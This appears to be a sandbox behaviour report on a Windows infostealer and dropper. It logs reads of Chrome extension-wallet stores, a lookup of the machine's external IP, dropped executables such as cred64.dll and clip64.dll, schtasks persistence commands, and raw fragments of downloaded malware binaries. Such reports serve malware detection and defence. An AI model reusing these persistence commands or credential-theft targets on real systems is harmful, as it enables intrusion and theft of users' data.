DllCanUnloadNow+0xce86 IEAssociateThreadWithTab-0x2961f ieframe+0x252ca @ 0x729b52ca
CreateExtensionGuidEnumerator+0x5d622 SetQueryNetSessionCount-0x15f9a ieframe+0x100ea3 @ 0x72a90ea3
RtlGetUserInfoHeap+0x225 RtlQueueWorkItem-0x210 ntdll+0x67e96 @ 0x77907e96
TpCallbackIndependent+0x527 RtlIsCriticalSectionLockedByThread-0x240 ntdll+0x454f4 @ 0x778e54f4
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 71818224
registers.edi: 1974991376
registers.eax: 71818224
registers.ebp: 71818304
registers.edx: 1
registers.ebx: 5460556
registers.esi: 2147746133
registers.ecx: 2082696782

Steals private information from local Internet browsers (50 out of 4027 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\Local Extension Settings\cjmkndjhnagcfbpiemnkdpomccnjblmj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Local Extension Settings\lpilbniiabackdjcionkobglmddfbcjo\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\MEIPreload\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SafetyTips\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\GrShaderCache\Sync Extension Settings\aijcbedoijmgnlmjeegjaglmepbmpkpi\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Sync Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\RecoveryImproved\Local Extension Settings\bgpipimickeadkjlklgciifhnalhdjhe\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\GrShaderCache\Sync Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Local Extension Settings\epapihdplajcdnnkdeiahlgigofloibg\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Sync Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpn\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\lpilbniiabackdjcionkobglmddfbcjo\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Sync Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ZxcvbnData\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\RecoveryImproved\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Sync Extension Settings\jnkelfanjkeadonecabehalmbgpfodjm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Local Extension Settings\gjagmgiddbbciopjhllkdnddhcglnemk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\MEIPreload\Sync Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\recovery\Sync Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Sync Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Sync Extension Settings\fhilaheimglignddkjgofkcbgekhenbh\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobl\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crowd Deny\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ZxcvbnData\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Sync Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\Local Extension Settings\aijcbedoijmgnlmjeegjaglmepbmpkpi\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\GrShaderCache\Local Extension Settings\gjagmgiddbbciopjhllkdnddhcglnemk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflal\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Sync Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Subresource Filter\Sync Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm\CURRENT

Looks up the external IP address (1 event)

domain

ipinfo.io

Creates executable files on the filesystem (16 events)

file	C:\Users\test22\AppData\Roaming\006700e5a2ab05\cred64.dll
file	C:\Users\test22\AppData\Roaming\Temp\Task.bat
file	C:\Users\test22\AppData\Local\Temp\InstallSetup7.exe
file	C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\8CEyWgPtgDj3ygdsYA34.exe
file	C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\KdWG1WnjbLO0ejuSam0V.exe
file	C:\Users\test22\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
file	C:\Users\test22\AppData\Local\Temp\nsl94D5.tmp\INetC.dll
file	C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\n6P8X5rop5bCHCDpw23f.exe
file	C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll
file	C:\Users\test22\AppData\Local\Temp\BroomSetup.exe
file	C:\Users\test22\AppData\Local\Temp\rty25.exe
file	C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\Z2A_k3kHrLyUiJQeXEs0.exe
file	C:\Users\test22\AppData\Local\Temp\1000493001\latestrocki.exe
file	C:\Users\test22\AppData\Local\Temp\toolspub1.exe
file	C:\Users\test22\AppData\Local\Temp\1000495001\SetupPowerGREPDemo.exe
file	C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\8G51dyVKnnvS40g1JD2e.exe

Creates a suspicious process (5 events)

cmdline	schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\test22\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST

Drops a binary and executes it (11 events)

file	C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\8CEyWgPtgDj3ygdsYA34.exe
file	C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\Z2A_k3kHrLyUiJQeXEs0.exe
file	C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\8G51dyVKnnvS40g1JD2e.exe
file	C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\KdWG1WnjbLO0ejuSam0V.exe
file	C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe
file	C:\Users\test22\AppData\Local\Temp\1000493001\latestrocki.exe
file	C:\Users\test22\AppData\Local\Temp\1000495001\SetupPowerGREPDemo.exe
file	C:\Users\test22\AppData\Local\Temp\InstallSetup7.exe
file	C:\Users\test22\AppData\Local\Temp\toolspub1.exe
file	C:\Users\test22\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
file	C:\Users\test22\AppData\Local\Temp\rty25.exe

Drops an executable to the user AppData folder (22 events)

file	C:\Users\test22\AppData\Local\Temp\SandboxieInstall.exe
file	C:\Users\test22\AppData\Local\Temp\toolspub1.exe
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\clip64[1].dll
file	C:\Users\test22\AppData\Local\Temp\nsz9DA0.tmp
file	C:\Users\test22\AppData\Local\Temp\1000493001\latestrocki.exe
file	C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\Z2A_k3kHrLyUiJQeXEs0.exe
file	C:\Users\test22\AppData\Local\Temp\BroomSetup.exe
file	C:\Users\test22\AppData\Local\Temp\202005191702_6d173b9549ce4fe1e5ada5ab9ce0bfff5d9569f19e7fa916db5c8d4f0dace63b_setup_nwc275a_demo.exe
file	C:\Users\test22\AppData\Local\Temp\Setup00000994\OSETUPUI.DLL
file	C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\KdWG1WnjbLO0ejuSam0V.exe
file	C:\Users\test22\AppData\Local\Temp\Setup00000994\OSETUP.DLL
file	C:\Users\test22\AppData\Local\Temp\face.exe
file	C:\Users\test22\AppData\Local\Temp\Setup000023ac\OSETUP.DLL
file	C:\Users\test22\AppData\Local\Temp\Setup000023ac\ose00000.exe
file	C:\Users\test22\AppData\Local\Temp\Setup00000994\ose00000.exe
file	C:\Users\test22\AppData\Local\Temp\nsl94D5.tmp\INetC.dll
file	C:\Users\test22\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
file	C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe
file	C:\Users\test22\AppData\Local\Temp\InstallSetup7.exe
file	C:\Users\test22\AppData\Local\Temp\Setup000023ac\OSETUPUI.DLL
file	C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\8CEyWgPtgDj3ygdsYA34.exe
file	C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\8G51dyVKnnvS40g1JD2e.exe

A process created a hidden window (7 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Jan. 23, 2024, 7:55 a.m.	thread_identifier: 2448 thread_handle: 0x00000140 process_identifier: 2444 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x0000013c	1	1
CreateProcessInternalW Jan. 23, 2024, 7:55 a.m.	thread_identifier: 2556 thread_handle: 0x00000148 process_identifier: 2552 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000144	1	1
ShellExecuteExW Jan. 23, 2024, 7:55 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe	1	1
ShellExecuteExW Jan. 23, 2024, 7:55 a.m.	show_type: 0 filepath_r: SCHTASKS parameters: /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F filepath: SCHTASKS	1	1
ShellExecuteExW Jan. 23, 2024, 7:56 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000493001\latestrocki.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000493001\latestrocki.exe	1	1
ShellExecuteExW Jan. 23, 2024, 7:56 a.m.	show_type: 0 filepath_r: rundll32.exe parameters: C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll, Main filepath: rundll32.exe	1	1
ShellExecuteExW Jan. 23, 2024, 7:56 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000495001\SetupPowerGREPDemo.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000495001\SetupPowerGREPDemo.exe	1	1

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (3 events)

Time & API	Arguments	Status	Return
Process32NextW Jan. 23, 2024, 7:55 a.m.	snapshot_handle: 0x00000488 process_name: SearchProtocolHost.exe process_identifier: 1028	1	1
Process32NextW Jan. 23, 2024, 7:55 a.m.	snapshot_handle: 0x00000488 process_name: svchost.exe process_identifier: 2240	1	1
Process32NextW Jan. 23, 2024, 7:55 a.m.	snapshot_handle: 0x00000488 process_name: conhost.exe process_identifier: 2460	1	1

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Jan. 23, 2024, 7:55 a.m.	process_identifier: 2856 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8192 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x02920000 process_handle: 0xffffffff	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Jan. 23, 2024, 7:56 a.m.	flags: 15 family: 0		111	0

An executable file was downloaded by the processes face.exe, explorhe.exe, installsetup7.exe (9 events)

Time & API	Arguments	Status	Return
InternetReadFile Jan. 23, 2024, 7:55 a.m.	buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $Ç®Þ¦íýÞ¦íýÞ¦íýj:ýý¦íýj:ýC¦íýj:ýý¦íý@*ýß¦íýÎèüó¦íýÎéüÌ¦íýÎîüË¦íý×Þný×¦íý×Þ~ýû¦íýÞ¦ìý÷¤íý{Ïãü¦íý{Ïîüß¦íý{Ïýß¦íýÞ¦zýß¦íý{Ïïüß¦íýRichÞ¦íýPEL¼]¯eà"¬ LwÀ @`,@@@d\|@ @à uð4@À .text« ¬ `.rdataûÀ ü° @@.datalpÀH¬@À.rsrc@@ ô@@.relocuà v @B¹t Mè8ýhé#DèðYÃhó#DèðYÃèæÞhø#DèrðYÃèY<hý#DèaðYÃQè©h$DèOðYÃ¡0MQ@0MPèã#h$Dè/ðYÃèÞ%h$DèðYÃè®çh!$Dè ðYÃèA2h&$DèüïYÃèPÁh0$DèëïYÃ¹%Mèh?$DèÕïYÃVñNè´Nè¬j(VèâìYYÆ^ÂUìì8Ç0MtÉI3ÒÇM0ÉI M¤MVQf¨Mèo¡0M@Ç0M\ÉI¡0MHûÿÿ,M3À¹¸M£ÌM£ÐM£ÔMèY ¹èMèí¹øMèã¹MèÙ3À¹M£TM£XM£\M£`M£dM£hM£lM£pM£tM£xMè3ÀÇ¬M<ÉI¹M£M£Mf£M£ M£¤Mf£¨M£°M£´M£¸M£¼M£ÀM£ÄMÇÈM@ÉI£ÌM£ÐM£ÔMÇØM@ÉI£ÜM£àM£äMÇèM@ÉI£ìM£ðM£ôMÇøMDÉI£üM£M£M£M£MÇMèÏ¹(MèÇM<ÉI3Ò¹MMMMè¹@Mè3À¹MP£`M£dM£hM£pM£tM£xMèGMÈè$P¡0MHÁ4MèMèè¼MÈè{¼3ÀfÇ0Mjö£,M£ M£$M£M£M£(M£Mf£lM¢M¢}M£\MÿhÂIðö3Ò\|MèÂRÿhÈI¸0M^ÉÂ¡0M¹@MV@Ç0MhÉI3À£4M£8M£<Mè+¹tMè!¾¨MÎèh ÉIÎèoW¸0M^ÂVñNèeNè request_handle: 0x00cc000c	1	1
InternetReadFile Jan. 23, 2024, 7:55 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $wDþØ3%3%3%hM=%hM%hM %æH!%æH'%æHF%hM"%3%ã%¨K2%¨Ko2%¨K2%Rich3%PELlÖeà °$_@ @@@8Ð6`ðØ(Ð6`´8Ð6<@à j@@àP@ ª@à´@àP ´@à.rsrcð´@àÐ/¶@à.data° Ð6¦ ¶@à/ t³¥-Z±ôG Peòmb Àï"Ô6»S¼^`ÈgÂ§eLô¨.Àá£O{ÊÇÔUqðÂ{àwaV#¾<ßYàFâcêºÓô³ó\|Ä$³4\YmÙ°Wlu+Oë ö©l¢ëÄÚ¯\Y~dÕOÐ¼}g-¯A÷o)lGëc+c"ÏAþ{láõÑx£f¾:«_%Xq¬U¡¡¯__¾ $%u0á®á Þ'.7~~²Ý6%ý»õ?>Ñ¯Ëù[²ÓS5·øåÿ3Êj;Ì½'ô ñ3VÚùâ6Äçz?ÌB®2ýN³©Ôtäæµ`N{gÓHËñÁ#^úÇnãmL¢Ðvèë±Ý~¨ú@ì{Â¯¿òÝ1â¼6á'ßèåÎòë&<3x¿òg>½ýv}\|¶wþëùº)b÷@\|¸×¦5îR`ôÅÝÿÎs¦t$ÿhÍù[UWë6L`ç\v{VJ~æ1'q!d÷:-Ô¾FÎ4cÍ+ÜW)GÛè9Ób)0/fÞæïã¶#iÁ+6\|µYtTh(®æ=Û ÿñ 6¨»º=4)!@8½YÀ?:ón®f/ïiAÝ=øÂ±]pÀÝrB¸jRfv²·#J+ÌÖMOZA#¶ÖÍðø5ñ×[ÈLØïUm7%¢:¬ûö®_`¥ íïKMñ¿ËâqÖ9£d§®E~´¼/±Rá#IêÞRO¥üÖwp²JHoÔ ´Èíãß\|Ø(åbsÚ¨á%DXâÈ£æ ±PÆð?Mh#¹wB¥3·µ¸^¬éÉÓU®^r¤9#&iíx£ÂI&iôÎ»^}{ò2ÑÌÕN(t3¯¡ÈmæÁ}/q¬M"më¢ªÊ$ó¶VÕy½2ïÀàf±üï±2»¾ùWjÅ øºTÌ#D5ÂëèùÝÈ!dSeêå(MÑÅÞ Óp âÂµ[ÌÎ c ¬)_#ãj°JUÏ×Ñ vm=åç@n'Æø0e06Y¸§¹Pðg¼Ôé¿P±%uXÓø8÷w!,Rçgq((¶ÈS¼Øo¯.ÁN§ý}÷1.¦@ ¯jÎÿâîÁV?yc¸³*5ÿÏ¨~¼?ÔâÌ9Ñ¶Z\|riíÇM°(ñ(¢Ý³øþSêbm¢NOæ[#¹þ«}]`rÅcSÆä request_handle: 0x00cc000c	1	1
InternetReadFile Jan. 23, 2024, 7:55 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL¡$eà.0èN @ ``K @¼ H.textTç è `.rsrc ê@@.reloc@ð@B0HdXtà`$0]+(i46J~:K( è s ( þþ ( ( ?rps z6+(§Ækn(N+(ñØZ0(( j+(pñ]N(( }0@s @ (&0c ?( ~ ( :E £ÂÐ ßa~o{a(3( %(& Ð( (&(&0( ~ 8i o oÕÝ; b cea~o{¡a(3( 90 o (:(&( o (&Xi?ÿÿÿ(&0( ~ 8d o Î¼Z$ Í¤X /ÔÍa~o{¦a(3( 9+ o (:(& o (&Xi?ÿÿÿ(&0 e ?( ~ ( :G.( þ%(&%~ ( & Ð( (&(&0_~ o :~ o! o" 8o# ; o" Ý 9o$ ÜÝ&Ý 9F XX0å(((( ×@Îf Wa~o{¥a(3( ¼¿> è¢a !ÑÀöa~o{a(3 Áv` I¸{a ôa~o{a(3 ?M ÆFa~o{a(3( ¼¿> è¢a 6]ëa~o{a(3 ê¹u Ïånna~o{¤a(3 ®¡ «GÏa~o{a(3( ì b Ì/ 8a~o{[a(3 æsÊØ Ï a~o{ja(3 ¸:å !°Ëa~o{\|a(3( W6 ¦b&Y Ö=Ê8a~o{Sa(3 e c d ëya~o{[a(3 %áj mÔ(X BbÞa~o{Qa(3( ãñ4H Ý8ñza~o{Sa(3 ¡ì6_ Hóoa y~Ã!a~o{¢a(3 h?e +ëàa~o{Ya(3( %áj mÔ(X ÁÈÍa~o{a(3 ¿~P request_handle: 0x00cc000c	1	1
InternetReadFile Jan. 23, 2024, 7:55 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $CÔëìº¸ìº¸ìº¸L¹¹ ìº¸L¿¹Æìº¸L½¹ìº¸HG¸ìº¸H¾¹ìº¸H¹¹ìº¸H¿¹Rìº¸L¾¹ìº¸L¼¹ìº¸L»¹ìº¸ì»¸íº¸Ì³¹ìº¸ÌE¸ìº¸ì-¸ìº¸Ì¸¹ìº¸Richìº¸PEL¿«eà"jìN°@0N@PD@ø=PD[8 @àp°.@à@ L@àP`T@à°V@à.rsrc@@>V@àÐ/@à.dataà PDØ @àL:?U¾´4q#ó9« t\|éwÇ<S¡;½\|téÌÁ¡&&TÅ¢é4,u&4ÊaØc\©LÔ »À×Ða>´b¯qÙÿMÂøEðD°Ä3Ädn8<Ö½ Üy×3#Ç@l½\|)C_rÎ=g×/¸ÊÌ<@?aÓ.vnmþÀe<ZS},hæà©[h&¨un¡ENÑÏ1\@ëïeÙ>RùèþN%g¾O©aeÌ¦åÒ ý-è¹I ê&PÏT xÍØnN&j85*Ý#¼%,ÿ·ü°ì¿ßc;UK¸(~`øL[$ÉFV+Üî$Ú´FmOõBò©Ó>ÄÜ£Aîe'×k§ÑÉjßÌ2o°÷Ý·M¹Ãsº+c[_±¢G"JMªs4ÕOºv¬Ç®#Ä \|"=hÁ~0¦Îñ\|-n#5è¥0{¨gaÀÍÇPq)áqÀ×dq¯&%n¶Îñ-â«ª-mäðyDJg~à¯'Ð3=¹9ò&ï_^xÓ`f¿fdS\|ÖÙ0<½1ÔÂCìWË,VDÉnvócññ;¹bh \0oÐXoÖÏ·øíïÏî8bám8R¤igÏ-«¹:uÐ4ø¦Ôü9ÕI°{e[eº_Äjëº]5u&+]Ü²ý$%Æ+O+YT3Gnë{_ÃþÌ]KâkãrððxG´¿wÓ!¿±~-UC(!%>0ÅfOoé¯r%4;RYaæÎ±ðà%«+GQÚ/1ÔdÝ²%Ñí0u¿:Òònõ×ZªnÂ±Xd®¢y2ï×«Ác®;°43ë![Þ¤GÀðÏÓ©Cë¢E×Êêæy=;éyèÇoeâ ïî#úù3XÿS×«§(@)l×XeáV@®l¿G ÚçÖbãïQ+ÿ¶5 ÍRpÛvøÄÀåó ²9.éVæj}ÞC¦ÀÈèòq(>èµàoÍZF¿ã$Î´àm1ýÉ[a×ÇT"_ Øds¼dþl8Íaê¢OÑÀ²®ªBC"RÕ¶ÑwSo¯ÒÈýìévÚ{ô²+µö¤?©,Ü8GWõÁº\Ãà"®æ/d¦ QfcÊ_Õ¥Ã)ÀoÄj7gTèój½Oû¬£r¦Y8Ô@p¥R×_lKÕêv\|\0¶ERxWÜ³ý request_handle: 0x00cc000c	1	1
InternetReadFile Jan. 23, 2024, 7:55 a.m.	buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $Ç®Þ¦íýÞ¦íýÞ¦íýj:ýý¦íýj:ýC¦íýj:ýý¦íý@*ýß¦íýÎèüó¦íýÎéüÌ¦íýÎîüË¦íý×Þný×¦íý×Þ~ýû¦íýÞ¦ìý÷¤íý{Ïãü¦íý{Ïîüß¦íý{Ïýß¦íýÞ¦zýß¦íý{Ïïüß¦íýRichÞ¦íýPEL¾]¯eà"¬ JwÀ @P¯@@@d\|@ àÐ uð4@À .text« ¬ `.rdataûÀ ü° @@.datalpÀH¬@À.rsrcà@ ô@@.relocuÐ v @B¹t Mè8ýhé#DèðYÃhó#DèðYÃèæÞhø#DèrðYÃèY<hý#DèaðYÃQè©h$DèOðYÃ¡0MQ@0MPèã#h$Dè/ðYÃèÞ%h$DèðYÃè®çh!$Dè ðYÃèA2h&$DèüïYÃèPÁh0$DèëïYÃ¹%Mèh?$DèÕïYÃVñNè´Nè¬j(VèâìYYÆ^ÂUìì8Ç0MtÉI3ÒÇM0ÉI M¤MVQf¨Mèo¡0M@Ç0M\ÉI¡0MHûÿÿ,M3À¹¸M£ÌM£ÐM£ÔMèY ¹èMèí¹øMèã¹MèÙ3À¹M£TM£XM£\M£`M£dM£hM£lM£pM£tM£xMè3ÀÇ¬M<ÉI¹M£M£Mf£M£ M£¤Mf£¨M£°M£´M£¸M£¼M£ÀM£ÄMÇÈM@ÉI£ÌM£ÐM£ÔMÇØM@ÉI£ÜM£àM£äMÇèM@ÉI£ìM£ðM£ôMÇøMDÉI£üM£M£M£M£MÇMèÏ¹(MèÇM<ÉI3Ò¹MMMMè¹@Mè3À¹MP£`M£dM£hM£pM£tM£xMèGMÈè$P¡0MHÁ4MèMèè¼MÈè{¼3ÀfÇ0Mjö£,M£ M£$M£M£M£(M£Mf£lM¢M¢}M£\MÿhÂIðö3Ò\|MèÂRÿhÈI¸0M^ÉÂ¡0M¹@MV@Ç0MhÉI3À£4M£8M£<Mè+¹tMè!¾¨MÎèh ÉIÎèoW¸0M^ÂVñNèeNè request_handle: 0x00cc000c	1	1
